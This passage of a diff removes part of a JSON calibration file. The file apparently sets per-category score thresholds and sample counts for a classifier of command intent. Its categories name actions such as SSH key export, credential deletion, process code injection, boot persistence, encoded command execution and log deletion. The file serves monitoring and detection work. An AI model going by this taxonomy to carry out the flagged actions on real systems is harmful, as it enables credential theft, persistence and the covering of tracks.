-
"tp_samples": 132
|
| 348 |
-
},
|
| 349 |
-
"delete_cloud_identity": {
|
| 350 |
-
"threshold": 0.7894,
|
| 351 |
-
"tp_p50": 0.8372,
|
| 352 |
-
"tp_samples": 103
|
| 353 |
-
},
|
| 354 |
-
"delete_cloud_resource": {
|
| 355 |
-
"threshold": 0.7485,
|
| 356 |
-
"tp_p50": 0.794,
|
| 357 |
-
"tp_samples": 104
|
| 358 |
-
},
|
| 359 |
-
"delete_cluster_secret": {
|
| 360 |
-
"threshold": 0.789,
|
| 361 |
-
"tp_p50": 0.8464,
|
| 362 |
-
"tp_samples": 133
|
| 363 |
-
},
|
| 364 |
-
"delete_container": {
|
| 365 |
-
"threshold": 0.6874,
|
| 366 |
-
"tp_p50": 0.8464,
|
| 367 |
-
"tp_samples": 117
|
| 368 |
-
},
|
| 369 |
-
"delete_container_image": {
|
| 370 |
-
"threshold": 0.7256,
|
| 371 |
-
"tp_p50": 0.7917,
|
| 372 |
-
"tp_samples": 110
|
| 373 |
-
},
|
| 374 |
-
"delete_credential_material": {
|
| 375 |
-
"threshold": 0.6564,
|
| 376 |
-
"tp_p50": 0.7905,
|
| 377 |
-
"tp_samples": 349
|
| 378 |
-
},
|
| 379 |
-
"delete_database": {
|
| 380 |
-
"threshold": 0.6837,
|
| 381 |
-
"tp_p50": 0.7965,
|
| 382 |
-
"tp_samples": 118
|
| 383 |
-
},
|
| 384 |
-
"delete_database_data": {
|
| 385 |
-
"threshold": 0.6273,
|
| 386 |
-
"tp_p50": 0.7763,
|
| 387 |
-
"tp_samples": 140
|
| 388 |
-
},
|
| 389 |
-
"delete_infrastructure_log": {
|
| 390 |
-
"threshold": 0.6904,
|
| 391 |
-
"tp_p50": 0.8135,
|
| 392 |
-
"tp_samples": 219
|
| 393 |
-
},
|
| 394 |
-
"delete_local_kubernetes_cluster": {
|
| 395 |
-
"threshold": 0.7161,
|
| 396 |
-
"tp_p50": 0.815,
|
| 397 |
-
"tp_samples": 114
|
| 398 |
-
},
|
| 399 |
-
"delete_object_storage": {
|
| 400 |
-
"threshold": 0.7169,
|
| 401 |
-
"tp_p50": 0.8125,
|
| 402 |
-
"tp_samples": 134
|
| 403 |
-
},
|
| 404 |
-
"delete_scheduled_task": {
|
| 405 |
-
"threshold": 0.7464,
|
| 406 |
-
"tp_p50": 0.8187,
|
| 407 |
-
"tp_samples": 147
|
| 408 |
-
},
|
| 409 |
-
"delete_secret_store": {
|
| 410 |
-
"threshold": 0.7269,
|
| 411 |
-
"tp_p50": 0.7851,
|
| 412 |
-
"tp_samples": 108
|
| 413 |
-
},
|
| 414 |
-
"delete_source_code": {
|
| 415 |
-
"threshold": 0.691,
|
| 416 |
-
"tp_p50": 0.7612,
|
| 417 |
-
"tp_samples": 113
|
| 418 |
-
},
|
| 419 |
-
"delete_system_log": {
|
| 420 |
-
"threshold": 0.6467,
|
| 421 |
-
"tp_p50": 0.8135,
|
| 422 |
-
"tp_samples": 245
|
| 423 |
-
},
|
| 424 |
-
"delete_systemd_unit": {
|
| 425 |
-
"threshold": 0.7714,
|
| 426 |
-
"tp_p50": 0.8278,
|
| 427 |
-
"tp_samples": 107
|
| 428 |
-
},
|
| 429 |
-
"delete_user": {
|
| 430 |
-
"threshold": 0.7637,
|
| 431 |
-
"tp_p50": 0.8657,
|
| 432 |
-
"tp_samples": 109
|
| 433 |
-
},
|
| 434 |
-
"deploy_cloud_template": {
|
| 435 |
-
"threshold": 0.7584,
|
| 436 |
-
"tp_p50": 0.7903,
|
| 437 |
-
"tp_samples": 108
|
| 438 |
-
},
|
| 439 |
-
"destroy_infrastructure_template": {
|
| 440 |
-
"threshold": 0.7483,
|
| 441 |
-
"tp_p50": 0.8196,
|
| 442 |
-
"tp_samples": 119
|
| 443 |
-
},
|
| 444 |
-
"disable_service": {
|
| 445 |
-
"threshold": 0.6817,
|
| 446 |
-
"tp_p50": 0.8133,
|
| 447 |
-
"tp_samples": 130
|
| 448 |
-
},
|
| 449 |
-
"download_executable": {
|
| 450 |
-
"threshold": 0.5748,
|
| 451 |
-
"tp_p50": 0.6657,
|
| 452 |
-
"tp_samples": 213
|
| 453 |
-
},
|
| 454 |
-
"download_external_content": {
|
| 455 |
-
"threshold": 0.4931,
|
| 456 |
-
"tp_p50": 0.6022,
|
| 457 |
-
"tp_samples": 711
|
| 458 |
-
},
|
| 459 |
-
"download_internal_content": {
|
| 460 |
-
"threshold": 0.5448,
|
| 461 |
-
"tp_p50": 0.6474,
|
| 462 |
-
"tp_samples": 431
|
| 463 |
-
},
|
| 464 |
-
"download_local_content": {
|
| 465 |
-
"threshold": 0.6659,
|
| 466 |
-
"tp_p50": 0.7478,
|
| 467 |
-
"tp_samples": 104
|
| 468 |
-
},
|
| 469 |
-
"download_named_content": {
|
| 470 |
-
"threshold": 0.5718,
|
| 471 |
-
"tp_p50": 0.6736,
|
| 472 |
-
"tp_samples": 162
|
| 473 |
-
},
|
| 474 |
-
"download_object_storage": {
|
| 475 |
-
"threshold": 0.6075,
|
| 476 |
-
"tp_p50": 0.6665,
|
| 477 |
-
"tp_samples": 218
|
| 478 |
-
},
|
| 479 |
-
"download_script": {
|
| 480 |
-
"threshold": 0.5612,
|
| 481 |
-
"tp_p50": 0.6822,
|
| 482 |
-
"tp_samples": 363
|
| 483 |
-
},
|
| 484 |
-
"enable_service": {
|
| 485 |
-
"threshold": 0.6228,
|
| 486 |
-
"tp_p50": 0.8019,
|
| 487 |
-
"tp_samples": 268
|
| 488 |
-
},
|
| 489 |
-
"encode_data": {
|
| 490 |
-
"threshold": 0.6378,
|
| 491 |
-
"tp_p50": 0.7107,
|
| 492 |
-
"tp_samples": 118
|
| 493 |
-
},
|
| 494 |
-
"encrypt_data": {
|
| 495 |
-
"threshold": 0.5854,
|
| 496 |
-
"tp_p50": 0.6496,
|
| 497 |
-
"tp_samples": 173
|
| 498 |
-
},
|
| 499 |
-
"enumerate_cloud_accounts": {
|
| 500 |
-
"threshold": 0.7469,
|
| 501 |
-
"tp_p50": 0.8039,
|
| 502 |
-
"tp_samples": 132
|
| 503 |
-
},
|
| 504 |
-
"enumerate_cloud_identity": {
|
| 505 |
-
"threshold": 0.7273,
|
| 506 |
-
"tp_p50": 0.8196,
|
| 507 |
-
"tp_samples": 160
|
| 508 |
-
},
|
| 509 |
-
"enumerate_cloud_resources": {
|
| 510 |
-
"threshold": 0.6883,
|
| 511 |
-
"tp_p50": 0.7806,
|
| 512 |
-
"tp_samples": 172
|
| 513 |
-
},
|
| 514 |
-
"enumerate_cloud_secrets": {
|
| 515 |
-
"threshold": 0.7336,
|
| 516 |
-
"tp_p50": 0.8529,
|
| 517 |
-
"tp_samples": 120
|
| 518 |
-
},
|
| 519 |
-
"enumerate_cluster_resources": {
|
| 520 |
-
"threshold": 0.6408,
|
| 521 |
-
"tp_p50": 0.7959,
|
| 522 |
-
"tp_samples": 528
|
| 523 |
-
},
|
| 524 |
-
"enumerate_cluster_secrets": {
|
| 525 |
-
"threshold": 0.6719,
|
| 526 |
-
"tp_p50": 0.8149,
|
| 527 |
-
"tp_samples": 166
|
| 528 |
-
},
|
| 529 |
-
"enumerate_container_images": {
|
| 530 |
-
"threshold": 0.6911,
|
| 531 |
-
"tp_p50": 0.7858,
|
| 532 |
-
"tp_samples": 117
|
| 533 |
-
},
|
| 534 |
-
"enumerate_containers": {
|
| 535 |
-
"threshold": 0.6307,
|
| 536 |
-
"tp_p50": 0.8009,
|
| 537 |
-
"tp_samples": 183
|
| 538 |
-
},
|
| 539 |
-
"enumerate_database_schema": {
|
| 540 |
-
"threshold": 0.6795,
|
| 541 |
-
"tp_p50": 0.7982,
|
| 542 |
-
"tp_samples": 450
|
| 543 |
-
},
|
| 544 |
-
"enumerate_filesystem": {
|
| 545 |
-
"threshold": 0.5685,
|
| 546 |
-
"tp_p50": 0.7079,
|
| 547 |
-
"tp_samples": 1303
|
| 548 |
-
},
|
| 549 |
-
"enumerate_kernel_modules": {
|
| 550 |
-
"threshold": 0.7595,
|
| 551 |
-
"tp_p50": 0.825,
|
| 552 |
-
"tp_samples": 110
|
| 553 |
-
},
|
| 554 |
-
"enumerate_listeners": {
|
| 555 |
-
"threshold": 0.6619,
|
| 556 |
-
"tp_p50": 0.7691,
|
| 557 |
-
"tp_samples": 193
|
| 558 |
-
},
|
| 559 |
-
"enumerate_logged_in_users": {
|
| 560 |
-
"threshold": 0.7132,
|
| 561 |
-
"tp_p50": 0.7871,
|
| 562 |
-
"tp_samples": 110
|
| 563 |
-
},
|
| 564 |
-
"enumerate_network_connections": {
|
| 565 |
-
"threshold": 0.6908,
|
| 566 |
-
"tp_p50": 0.7941,
|
| 567 |
-
"tp_samples": 263
|
| 568 |
-
},
|
| 569 |
-
"enumerate_object_storage": {
|
| 570 |
-
"threshold": 0.7243,
|
| 571 |
-
"tp_p50": 0.8205,
|
| 572 |
-
"tp_samples": 290
|
| 573 |
-
},
|
| 574 |
-
"enumerate_open_files": {
|
| 575 |
-
"threshold": 0.6981,
|
| 576 |
-
"tp_p50": 0.7901,
|
| 577 |
-
"tp_samples": 160
|
| 578 |
-
},
|
| 579 |
-
"enumerate_packages": {
|
| 580 |
-
"threshold": 0.6189,
|
| 581 |
-
"tp_p50": 0.783,
|
| 582 |
-
"tp_samples": 677
|
| 583 |
-
},
|
| 584 |
-
"enumerate_processes": {
|
| 585 |
-
"threshold": 0.5937,
|
| 586 |
-
"tp_p50": 0.776,
|
| 587 |
-
"tp_samples": 979
|
| 588 |
-
},
|
| 589 |
-
"enumerate_scheduled_tasks": {
|
| 590 |
-
"threshold": 0.7378,
|
| 591 |
-
"tp_p50": 0.8023,
|
| 592 |
-
"tp_samples": 152
|
| 593 |
-
},
|
| 594 |
-
"enumerate_services": {
|
| 595 |
-
"threshold": 0.7177,
|
| 596 |
-
"tp_p50": 0.8071,
|
| 597 |
-
"tp_samples": 100
|
| 598 |
-
},
|
| 599 |
-
"enumerate_users": {
|
| 600 |
-
"threshold": 0.6327,
|
| 601 |
-
"tp_p50": 0.7307,
|
| 602 |
-
"tp_samples": 123
|
| 603 |
-
},
|
| 604 |
-
"enumerate_workloads": {
|
| 605 |
-
"threshold": 0.6822,
|
| 606 |
-
"tp_p50": 0.7614,
|
| 607 |
-
"tp_samples": 66
|
| 608 |
-
},
|
| 609 |
-
"execute_cloud_compute": {
|
| 610 |
-
"threshold": 0.6317,
|
| 611 |
-
"tp_p50": 0.6851,
|
| 612 |
-
"tp_samples": 133
|
| 613 |
-
},
|
| 614 |
-
"execute_detached_process": {
|
| 615 |
-
"threshold": 0.5426,
|
| 616 |
-
"tp_p50": 0.6384,
|
| 617 |
-
"tp_samples": 464
|
| 618 |
-
},
|
| 619 |
-
"execute_downloaded_content": {
|
| 620 |
-
"threshold": 0.5087,
|
| 621 |
-
"tp_p50": 0.6003,
|
| 622 |
-
"tp_samples": 422
|
| 623 |
-
},
|
| 624 |
-
"execute_encoded_command": {
|
| 625 |
-
"threshold": 0.6755,
|
| 626 |
-
"tp_p50": 0.7586,
|
| 627 |
-
"tp_samples": 110
|
| 628 |
-
},
|
| 629 |
-
"execute_from_temporary_path": {
|
| 630 |
-
"threshold": 0.5086,
|
| 631 |
-
"tp_p50": 0.6274,
|
| 632 |
-
"tp_samples": 927
|
| 633 |
-
},
|
| 634 |
-
"execute_from_user_writable_path": {
|
| 635 |
-
"threshold": 0.5868,
|
| 636 |
-
"tp_p50": 0.6874,
|
| 637 |
-
"tp_samples": 140
|
| 638 |
-
},
|
| 639 |
-
"execute_in_chroot": {
|
| 640 |
-
"threshold": 0.5636,
|
| 641 |
-
"tp_p50": 0.6283,
|
| 642 |
-
"tp_samples": 206
|
| 643 |
-
},
|
| 644 |
-
"execute_in_container": {
|
| 645 |
-
"threshold": 0.5318,
|
| 646 |
-
"tp_p50": 0.6008,
|
| 647 |
-
"tp_samples": 437
|
| 648 |
-
},
|
| 649 |
-
"execute_in_workload": {
|
| 650 |
-
"threshold": 0.5627,
|
| 651 |
-
"tp_p50": 0.6586,
|
| 652 |
-
"tp_samples": 363
|
| 653 |
-
},
|
| 654 |
-
"execute_package_hook": {
|
| 655 |
-
"threshold": 0.6658,
|
| 656 |
-
"tp_p50": 0.7576,
|
| 657 |
-
"tp_samples": 125
|
| 658 |
-
},
|
| 659 |
-
"execute_remote_command": {
|
| 660 |
-
"threshold": 0.4979,
|
| 661 |
-
"tp_p50": 0.5971,
|
| 662 |
-
"tp_samples": 1374
|
| 663 |
-
},
|
| 664 |
-
"execute_scheduled_task": {
|
| 665 |
-
"threshold": 0.6857,
|
| 666 |
-
"tp_p50": 0.7771,
|
| 667 |
-
"tp_samples": 125
|
| 668 |
-
},
|
| 669 |
-
"execute_via_dynamic_loader": {
|
| 670 |
-
"threshold": 0.6875,
|
| 671 |
-
"tp_p50": 0.7607,
|
| 672 |
-
"tp_samples": 126
|
| 673 |
-
},
|
| 674 |
-
"execute_with_changed_identity": {
|
| 675 |
-
"threshold": 0.5693,
|
| 676 |
-
"tp_p50": 0.6263,
|
| 677 |
-
"tp_samples": 187
|
| 678 |
-
},
|
| 679 |
-
"export_cluster_config": {
|
| 680 |
-
"threshold": 0.6523,
|
| 681 |
-
"tp_p50": 0.7264,
|
| 682 |
-
"tp_samples": 123
|
| 683 |
-
},
|
| 684 |
-
"export_cluster_resources": {
|
| 685 |
-
"threshold": 0.6604,
|
| 686 |
-
"tp_p50": 0.7899,
|
| 687 |
-
"tp_samples": 113
|
| 688 |
-
},
|
| 689 |
-
"export_database_dump": {
|
| 690 |
-
"threshold": 0.588,
|
| 691 |
-
"tp_p50": 0.7732,
|
| 692 |
-
"tp_samples": 856
|
| 693 |
-
},
|
| 694 |
-
"export_ssh_key": {
|
| 695 |
-
"threshold": 0.6655,
|
| 696 |
-
"tp_p50": 0.7379,
|
| 697 |
-
"tp_samples": 117
|
| 698 |
-
},
|
| 699 |
-
"extract_archive": {
|
| 700 |
-
"threshold": 0.5768,
|
| 701 |
-
"tp_p50": 0.6592,
|
| 702 |
-
"tp_samples": 223
|
| 703 |
-
},
|
| 704 |
-
"fetch_remote_certificate": {
|
| 705 |
-
"threshold": 0.6344,
|
| 706 |
-
"tp_p50": 0.6968,
|
| 707 |
-
"tp_samples": 178
|
| 708 |
-
},
|
| 709 |
-
"fetch_remote_mail": {
|
| 710 |
-
"threshold": 0.7509,
|
| 711 |
-
"tp_p50": 0.7796,
|
| 712 |
-
"tp_samples": 110
|
| 713 |
-
},
|
| 714 |
-
"flush_cache_data": {
|
| 715 |
-
"threshold": 0.6307,
|
| 716 |
-
"tp_p50": 0.7261,
|
| 717 |
-
"tp_samples": 129
|
| 718 |
-
},
|
| 719 |
-
"format_filesystem": {
|
| 720 |
-
"threshold": 0.7579,
|
| 721 |
-
"tp_p50": 0.8166,
|
| 722 |
-
"tp_samples": 153
|
| 723 |
-
},
|
| 724 |
-
"generate_artifact_digest": {
|
| 725 |
-
"threshold": 0.6133,
|
| 726 |
-
"tp_p50": 0.7441,
|
| 727 |
-
"tp_samples": 506
|
| 728 |
-
},
|
| 729 |
-
"grant_cloud_privilege": {
|
| 730 |
-
"threshold": 0.6825,
|
| 731 |
-
"tp_p50": 0.7921,
|
| 732 |
-
"tp_samples": 165
|
| 733 |
-
},
|
| 734 |
-
"grant_cluster_privilege": {
|
| 735 |
-
"threshold": 0.7027,
|
| 736 |
-
"tp_p50": 0.8091,
|
| 737 |
-
"tp_samples": 162
|
| 738 |
-
},
|
| 739 |
-
"grant_database_privilege": {
|
| 740 |
-
"threshold": 0.7207,
|
| 741 |
-
"tp_p50": 0.8461,
|
| 742 |
-
"tp_samples": 133
|
| 743 |
-
},
|
| 744 |
-
"grant_infrastructure_privilege": {
|
| 745 |
-
"threshold": 0.6554,
|
| 746 |
-
"tp_p50": 0.73,
|
| 747 |
-
"tp_samples": 116
|
| 748 |
-
},
|
| 749 |
-
"grant_user_privilege": {
|
| 750 |
-
"threshold": 0.6376,
|
| 751 |
-
"tp_p50": 0.7965,
|
| 752 |
-
"tp_samples": 153
|
| 753 |
-
},
|
| 754 |
-
"import_database_dump": {
|
| 755 |
-
"threshold": 0.6219,
|
| 756 |
-
"tp_p50": 0.7356,
|
| 757 |
-
"tp_samples": 253
|
| 758 |
-
},
|
| 759 |
-
"import_ssh_key": {
|
| 760 |
-
"threshold": 0.7656,
|
| 761 |
-
"tp_p50": 0.789,
|
| 762 |
-
"tp_samples": 118
|
| 763 |
-
},
|
| 764 |
-
"increase_file_permission": {
|
| 765 |
-
"threshold": 0.5329,
|
| 766 |
-
"tp_p50": 0.6577,
|
| 767 |
-
"tp_samples": 529
|
| 768 |
-
},
|
| 769 |
-
"initialize_infrastructure_template": {
|
| 770 |
-
"threshold": 0.6989,
|
| 771 |
-
"tp_p50": 0.7703,
|
| 772 |
-
"tp_samples": 116
|
| 773 |
-
},
|
| 774 |
-
"inject_process_code": {
|
| 775 |
-
"threshold": 0.6645,
|
| 776 |
-
"tp_p50": 0.7444,
|
| 777 |
-
"tp_samples": 105
|
| 778 |
-
},
|
| 779 |
-
"inspect_audit_policy": {
|
| 780 |
-
"threshold": 0.6796,
|
| 781 |
-
"tp_p50": 0.8039,
|
| 782 |
-
"tp_samples": 118
|
| 783 |
-
},
|
| 784 |
-
"inspect_auth_policy": {
|
| 785 |
-
"threshold": 0.6704,
|
| 786 |
-
"tp_p50": 0.7663,
|
| 787 |
-
"tp_samples": 190
|
| 788 |
-
},
|
| 789 |
-
"inspect_container_image": {
|
| 790 |
-
"threshold": 0.6885,
|
| 791 |
-
"tp_p50": 0.7663,
|
| 792 |
-
"tp_samples": 229
|
| 793 |
-
},
|
| 794 |
-
"inspect_container_runtime": {
|
| 795 |
-
"threshold": 0.6332,
|
| 796 |
-
"tp_p50": 0.743,
|
| 797 |
-
"tp_samples": 249
|
| 798 |
-
},
|
| 799 |
-
"inspect_current_identity": {
|
| 800 |
-
"threshold": 0.5551,
|
| 801 |
-
"tp_p50": 0.6526,
|
| 802 |
-
"tp_samples": 500
|
| 803 |
-
},
|
| 804 |
-
"inspect_current_privileges": {
|
| 805 |
-
"threshold": 0.6355,
|
| 806 |
-
"tp_p50": 0.748,
|
| 807 |
-
"tp_samples": 119
|
| 808 |
-
},
|
| 809 |
-
"inspect_ebpf_program": {
|
| 810 |
-
"threshold": 0.7264,
|
| 811 |
-
"tp_p50": 0.8048,
|
| 812 |
-
"tp_samples": 121
|
| 813 |
-
},
|
| 814 |
-
"inspect_file_metadata": {
|
| 815 |
-
"threshold": 0.5939,
|
| 816 |
-
"tp_p50": 0.7559,
|
| 817 |
-
"tp_samples": 1368
|
| 818 |
-
},
|
| 819 |
-
"inspect_firewall_policy": {
|
| 820 |
-
"threshold": 0.7129,
|
| 821 |
-
"tp_p50": 0.8216,
|
| 822 |
-
"tp_samples": 447
|
| 823 |
-
},
|
| 824 |
-
"inspect_infrastructure_service": {
|
| 825 |
-
"threshold": 0.572,
|
| 826 |
-
"tp_p50": 0.7226,
|
| 827 |
-
"tp_samples": 1301
|
| 828 |
-
},
|
| 829 |
-
"inspect_kernel_module": {
|
| 830 |
-
"threshold": 0.7201,
|
| 831 |
-
"tp_p50": 0.8277,
|
| 832 |
-
"tp_samples": 117
|
| 833 |
-
},
|
| 834 |
-
"inspect_local_kubernetes_cluster": {
|
| 835 |
-
"threshold": 0.7001,
|
| 836 |
-
"tp_p50": 0.7735,
|
| 837 |
-
"tp_samples": 102
|
| 838 |
-
},
|
| 839 |
-
"inspect_mail_queue": {
|
| 840 |
-
"threshold": 0.7124,
|
| 841 |
-
"tp_p50": 0.7646,
|
| 842 |
-
"tp_samples": 114
|
| 843 |
-
},
|
| 844 |
-
"inspect_network_state": {
|
| 845 |
-
"threshold": 0.7274,
|
| 846 |
-
"tp_p50": 0.8479,
|
| 847 |
-
"tp_samples": 955
|
| 848 |
-
},
|
| 849 |
-
"inspect_process_runtime_attributes": {
|
| 850 |
-
"threshold": 0.6744,
|
| 851 |
-
"tp_p50": 0.7603,
|
| 852 |
-
"tp_samples": 365
|
| 853 |
-
},
|
| 854 |
-
"inspect_service": {
|
| 855 |
-
"threshold": 0.6139,
|
| 856 |
-
"tp_p50": 0.7854,
|
| 857 |
-
"tp_samples": 685
|
| 858 |
-
},
|
| 859 |
-
"inspect_storage_state": {
|
| 860 |
-
"threshold": 0.6111,
|
| 861 |
-
"tp_p50": 0.7925,
|
| 862 |
-
"tp_samples": 1272
|
| 863 |
-
},
|
| 864 |
-
"inspect_system_state": {
|
| 865 |
-
"threshold": 0.5595,
|
| 866 |
-
"tp_p50": 0.7152,
|
| 867 |
-
"tp_samples": 1289
|
| 868 |
-
},
|
| 869 |
-
"inspect_workload": {
|
| 870 |
-
"threshold": 0.6707,
|
| 871 |
-
"tp_p50": 0.7906,
|
| 872 |
-
"tp_samples": 456
|
| 873 |
-
},
|
| 874 |
-
"install_boot_persistence": {
|
| 875 |
-
"threshold": 0.6708,
|
| 876 |
-
"tp_p50": 0.7624,
|
| 877 |
-
"tp_samples": 103
|
| 878 |
-
},
|
| 879 |
-
"install_package": {
|
| 880 |
-
"threshold": 0.5951,
|
| 881 |
-
"tp_p50": 0.7734,
|
| 882 |
-
"tp_samples": 751
|
| 883 |
-
},
|
| 884 |
-
"listen_local_port": {
|
| 885 |
-
"threshold": 0.6455,
|
| 886 |
-
"tp_p50": 0.6996,
|
| 887 |
-
"tp_samples": 130
|
| 888 |
-
},
|
| 889 |
-
"listen_network_port": {
|
| 890 |
-
"threshold": 0.5917,
|
| 891 |
-
"tp_p50": 0.6887,
|
| 892 |
-
"tp_samples": 364
|
| 893 |
-
},
|
| 894 |
-
"load_ebpf_program": {
|
| 895 |
-
"threshold": 0.6753,
|
| 896 |
-
"tp_p50": 0.7496,
|
| 897 |
-
"tp_samples": 161
|
| 898 |
-
},
|
| 899 |
-
"load_kernel_module": {
|
| 900 |
-
"threshold": 0.6787,
|
| 901 |
-
"tp_p50": 0.8112,
|
| 902 |
-
"tp_samples": 133
|
| 903 |
-
},
|
| 904 |
-
"manage_data_processing_job": {
|
| 905 |
-
"threshold": 0.5769,
|
| 906 |
-
"tp_p50": 0.6949,
|
| 907 |
-
"tp_samples": 961
|
| 908 |
-
},
|
| 909 |
-
"manage_database_backup": {
|
| 910 |
-
"threshold": 0.5461,
|
| 911 |
-
"tp_p50": 0.6699,
|
| 912 |
-
"tp_samples": 535
|
| 913 |
-
},
|
| 914 |
-
"manage_infrastructure_backup": {
|
| 915 |
-
"threshold": 0.5567,
|
| 916 |
-
"tp_p50": 0.6702,
|
| 917 |
-
"tp_samples": 628
|
| 918 |
-
},
|
| 919 |
-
"manage_snapshot": {
|
| 920 |
-
"threshold": 0.633,
|
| 921 |
-
"tp_p50": 0.7265,
|
| 922 |
-
"tp_samples": 171
|
| 923 |
-
},
|
| 924 |
-
"manage_virtual_machine": {
|
| 925 |
-
"threshold": 0.6352,
|
| 926 |
-
"tp_p50": 0.721,
|
| 927 |
-
"tp_samples": 177
|
| 928 |
-
},
|
| 929 |
-
"manage_vpn_connection": {
|
| 930 |
-
"threshold": 0.6876,
|
| 931 |
-
"tp_p50": 0.7393,
|
| 932 |
-
"tp_samples": 129
|
| 933 |
-
},
|
| 934 |
-
"modify_audit_policy": {
|
| 935 |
-
"threshold": 0.673,
|
| 936 |
-
"tp_p50": 0.7862,
|
| 937 |
-
"tp_samples": 139
|
| 938 |
-
},
|
| 939 |
-
"modify_auth_policy": {
|
| 940 |
-
"threshold": 0.6065,
|
| 941 |
-
"tp_p50": 0.712,
|
| 942 |
-
"tp_samples": 143
|
| 943 |
-
},
|
| 944 |
-
"modify_bootloader": {
|
| 945 |
-
"threshold": 0.6558,
|
| 946 |
-
"tp_p50": 0.7349,
|
| 947 |
-
"tp_samples": 113
|
| 948 |
-
},
|
| 949 |
-
"modify_business_config": {
|
| 950 |
-
"threshold": 0.6255,
|
| 951 |
-
"tp_p50": 0.7282,
|
| 952 |
-
"tp_samples": 93
|
| 953 |
-
},
|
| 954 |
-
"modify_cache_data": {
|
| 955 |
-
"threshold": 0.6291,
|
| 956 |
-
"tp_p50": 0.7223,
|
| 957 |
-
"tp_samples": 91
|
| 958 |
-
},
|
| 959 |
-
"modify_cloud_firewall": {
|
| 960 |
-
"threshold": 0.7522,
|
| 961 |
-
"tp_p50": 0.7984,
|
| 962 |
-
"tp_samples": 135
|
| 963 |
-
},
|
| 964 |
-
"modify_cloud_identity": {
|
| 965 |
-
"threshold": 0.7157,
|
| 966 |
-
"tp_p50": 0.7793,
|
| 967 |
-
"tp_samples": 100
|
| 968 |
-
},
|
| 969 |
-
"modify_cloud_identity_policy": {
|
| 970 |
-
"threshold": 0.7051,
|
| 971 |
-
"tp_p50": 0.7559,
|
| 972 |
-
"tp_samples": 115
|
| 973 |
-
},
|
| 974 |
-
"modify_cloud_resource": {
|
| 975 |
-
"threshold": 0.6439,
|
| 976 |
-
"tp_p50": 0.727,
|
| 977 |
-
"tp_samples": 129
|
| 978 |
-
},
|
| 979 |
-
"modify_cloud_secret": {
|
| 980 |
-
"threshold": 0.7041,
|
| 981 |
-
"tp_p50": 0.7499,
|
| 982 |
-
"tp_samples": 129
|
| 983 |
-
},
|
| 984 |
-
"modify_cluster_auth_policy": {
|
| 985 |
-
"threshold": 0.6812,
|
| 986 |
-
"tp_p50": 0.7617,
|
| 987 |
-
"tp_samples": 243
|
| 988 |
-
},
|
| 989 |
-
"modify_cluster_secret": {
|
| 990 |
-
"threshold": 0.7642,
|
| 991 |
-
"tp_p50": 0.8294,
|
| 992 |
-
"tp_samples": 144
|
| 993 |
-
},
|
| 994 |
-
"modify_container_network": {
|
| 995 |
-
"threshold": 0.638,
|
| 996 |
-
"tp_p50": 0.7424,
|
| 997 |
-
"tp_samples": 118
|
| 998 |
-
},
|
| 999 |
-
"modify_container_state": {
|
| 1000 |
-
"threshold": 0.6873,
|
| 1001 |
-
"tp_p50": 0.7834,
|
| 1002 |
-
"tp_samples": 126
|
| 1003 |
-
},
|
| 1004 |
-
"modify_coordination_data": {
|
| 1005 |
-
"threshold": 0.6861,
|
| 1006 |
-
"tp_p50": 0.7466,
|
| 1007 |
-
"tp_samples": 151
|
| 1008 |
-
},
|
| 1009 |
-
"modify_critical_system_path": {
|
| 1010 |
-
"threshold": 0.5731,
|
| 1011 |
-
"tp_p50": 0.6635,
|
| 1012 |
-
"tp_samples": 115
|
| 1013 |
-
},
|
| 1014 |
-
"modify_database_account": {
|
| 1015 |
-
"threshold": 0.6739,
|
| 1016 |
-
"tp_p50": 0.7816,
|
| 1017 |
-
"tp_samples": 126
|
| 1018 |
-
},
|
| 1019 |
-
"modify_database_data": {
|
| 1020 |
-
"threshold": 0.6065,
|
| 1021 |
-
"tp_p50": 0.7645,
|
| 1022 |
-
"tp_samples": 333
|
| 1023 |
-
},
|
| 1024 |
-
"modify_database_replication": {
|
| 1025 |
-
"threshold": 0.6684,
|
| 1026 |
-
"tp_p50": 0.7543,
|
| 1027 |
-
"tp_samples": 123
|
| 1028 |
-
},
|
| 1029 |
-
"modify_database_schema": {
|
| 1030 |
-
"threshold": 0.6628,
|
| 1031 |
-
"tp_p50": 0.7912,
|
| 1032 |
-
"tp_samples": 201
|
| 1033 |
-
},
|
| 1034 |
-
"modify_dns_config": {
|
| 1035 |
-
"threshold": 0.6421,
|
| 1036 |
-
"tp_p50": 0.7378,
|
| 1037 |
-
"tp_samples": 133
|
| 1038 |
-
},
|
| 1039 |
-
"modify_dynamic_loader": {
|
| 1040 |
-
"threshold": 0.7476,
|
| 1041 |
-
"tp_p50": 0.8144,
|
| 1042 |
-
"tp_samples": 110
|
| 1043 |
-
},
|
| 1044 |
-
"modify_file_acl": {
|
| 1045 |
-
"threshold": 0.7438,
|
| 1046 |
-
"tp_p50": 0.8049,
|
| 1047 |
-
"tp_samples": 127
|
| 1048 |
-
},
|
| 1049 |
-
"modify_file_permission": {
|
| 1050 |
-
"threshold": 0.5536,
|
| 1051 |
-
"tp_p50": 0.7175,
|
| 1052 |
-
"tp_samples": 476
|
| 1053 |
-
},
|
| 1054 |
-
"modify_file_timestamp": {
|
| 1055 |
-
"threshold": 0.6799,
|
| 1056 |
-
"tp_p50": 0.7714,
|
| 1057 |
-
"tp_samples": 178
|
| 1058 |
-
},
|
| 1059 |
-
"modify_firewall_policy": {
|
| 1060 |
-
"threshold": 0.7208,
|
| 1061 |
-
"tp_p50": 0.7997,
|
| 1062 |
-
"tp_samples": 582
|
| 1063 |
-
},
|
| 1064 |
-
"modify_group_identity": {
|
| 1065 |
-
"threshold": 0.6993,
|
| 1066 |
-
"tp_p50": 0.7892,
|
| 1067 |
-
"tp_samples": 126
|
| 1068 |
-
},
|
| 1069 |
-
"modify_group_membership": {
|
| 1070 |
-
"threshold": 0.6811,
|
| 1071 |
-
"tp_p50": 0.7655,
|
| 1072 |
-
"tp_samples": 363
|
| 1073 |
-
},
|
| 1074 |
-
"modify_infrastructure_account": {
|
| 1075 |
-
"threshold": 0.6202,
|
| 1076 |
-
"tp_p50": 0.7106,
|
| 1077 |
-
"tp_samples": 153
|
| 1078 |
-
},
|
| 1079 |
-
"modify_infrastructure_config": {
|
| 1080 |
-
"threshold": 0.517,
|
| 1081 |
-
"tp_p50": 0.6848,
|
| 1082 |
-
"tp_samples": 1085
|
| 1083 |
-
},
|
| 1084 |
-
"modify_kernel_memory": {
|
| 1085 |
-
"threshold": 0.7833,
|
| 1086 |
-
"tp_p50": 0.8242,
|
| 1087 |
-
"tp_samples": 100
|
| 1088 |
-
},
|
| 1089 |
-
"modify_kernel_parameter": {
|
| 1090 |
-
"threshold": 0.6275,
|
| 1091 |
-
"tp_p50": 0.7837,
|
| 1092 |
-
